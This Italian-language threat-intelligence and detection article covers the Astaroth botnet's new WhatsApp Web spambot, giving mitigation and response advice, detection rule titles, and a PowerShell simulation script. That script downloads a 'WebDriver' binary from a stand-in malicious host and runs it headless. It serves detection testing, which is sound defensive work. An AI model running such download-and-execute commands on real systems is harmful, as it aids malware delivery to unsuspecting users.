Astaroth Aggiunge un Nuovo Componente Spambot per Campagne Email
Detection stack
- AIDR
- Alert
- ETL
- Query
Sintesi
Gli operatori della botnet Astaroth hanno aggiunto un nuovo componente spambot di WhatsApp Web per ampliare la loro portata nell’ecosistema eCrime dell’America Latina. Il modulo utilizza l’automazione del browser senza testa per trasformare le vittime compromesse in nodi di distribuzione inviando messaggi dannosi ai loro contatti WhatsApp. Questo sviluppo segna un passaggio dallo spam tradizionale tramite email verso le piattaforme di messaggistica sociale.
Investigazione
L’indagine ha incluso un’analisi tecnica dettagliata dello spambot Astaroth, rivelando la crittografia AES-CTS, un complesso processo di offuscamento delle stringhe in sei fasi e strutture di configurazione personalizzate. I ricercatori hanno identificato notevoli somiglianze nel codice tra gli spambots Astaroth e Vareg, suggerendo sviluppatori condivisi o accordi di scambio di codice. L’analisi ha anche confermato l’uso improprio di framework di automazione del browser legittimi, inclusi WebDriver e WPPConnect/WA-JS, per eseguire campagne spam nascoste.
Mitigazione
Le organizzazioni dovrebbero educare gli utenti riguardo l’ingegneria sociale basata su WhatsApp e scoraggiare l’apertura o l’esecuzione di file ricevuti da contatti sconosciuti. Le protezioni di download del browser devono essere abilitate, mentre i download e le esecuzioni non autorizzati del WebDriver devono essere strettamente monitorati. I team di sicurezza dovrebbero anche prestare attenzione alla creazione di directory sospette all’interno della cartella Temp di Windows e considerare il blocco di WPPConnect/WA-JS quando non è richiesto per l’uso legittimo aziendale.
Risposta
Se viene rilevata l’attività di Astaroth, gli endpoint interessati devono essere isolati immediatamente per interrompere ulteriori propagazioni di spam e consegna di malware. Gli investigatori dovrebbero cercare processi di browser senza testa e directory ChromeAuto_ insolite all’interno C:UsersPublicTemp. I processi WebDriver identificati dovrebbero essere sottoposti ad analisi forense e l’attività di rete deve essere esaminata per connessioni non autorizzate all’infrastruttura C2 nota di Astaroth.
Flusso di Attacco
Rilevamenti
Comando e controllo sospetti tramite richiesta DNS con dominio di primo livello (TLD) insolito (via dns)
Visualizza
IOC (HashSha256) da rilevare: Inside Astaroth’s New Spambot Component
Visualizza
Rilevamento dell’attività di Astaroth Spambot WebDriver [Creazione processo Windows]
Visualizza
Esecuzione della simulazione
Prerequisito: Il controllo pre-volo di Telemetria e Baseline deve essere passato.
Razionale: Questa sezione detaglia l’esecuzione precisa della tecnica dell’avversario (TTP) progettata per attivare la regola di rilevamento. I comandi e la narrativa DEVONO riflettere direttamente i TTP identificati e mirare a generare l’esatta telemetria attesa dalla logica di rilevamento. Esempi astratti o non correlati porteranno a una diagnosi errata.
-
Narrativa dell’attacco e comandi: L’avversario intende distribuire un modulo automatizzato di spamming su WhatsApp. Per farlo, utilizza innanzitutto una tecnica living-off-the-land, utilizzando PowerShell per scaricare un
WebDriverbinario in una directory locale. Una volta presente lo strumento, l’avversario esegue il binario utilizzando i flag--headlessand--disable-infobars. Questo permette all’automazione di funzionare in background, invisibile per l’utente, facilitando la campagna di spam e riducendo al minimo l’impatto sull’host. -
Script di test di regressione:
# Script di simulazione Astaroth Spambot # Questo script simula la sequenza di download ed esecuzione definita nella regola di rilevamento. $workDir = "$env:TEMPWebDriverSimulation" if (!(Test-Path $workDir)) { New-Item -Path $workDir -ItemType Directory } Set-Location $workDir # 1. Simula Download (Attiva selection_webdriver_download) Write-Host "[+] Simulazione del download di WebDriver tramite PowerShell..." $dummyWebDriver = "WebDriver.exe" New-Item -Path $dummyWebDriver -ItemType File # Imitando la linea di comando che la regola cerca powershell.exe -Command "Invoke-WebRequest -Uri 'http://fake-malware-site.com/WebDriver' -OutFile 'WebDriver.exe'" # 2. Simula Esecuzione (Attiva selection_webdriver_execution e selection_session_creation) Write-Host "[+] Simulazione dell'esecuzione di WebDriver con flag senza testa..." # Usiamo Start-Process per assicurarci che la linea di comando venga catturata come evento di creazione processo Start-Process -FilePath ".$dummyWebDriver" -ArgumentList "--headless", "--disable-infobars" -NoNewWindow -
Comandi di pulizia:
# Pulizia degli artefatti di simulazione Remove-Item -Path "$env:TEMPWebDriverSimulation" -Recurse -Force Write-Host "[+] Pulizia completata."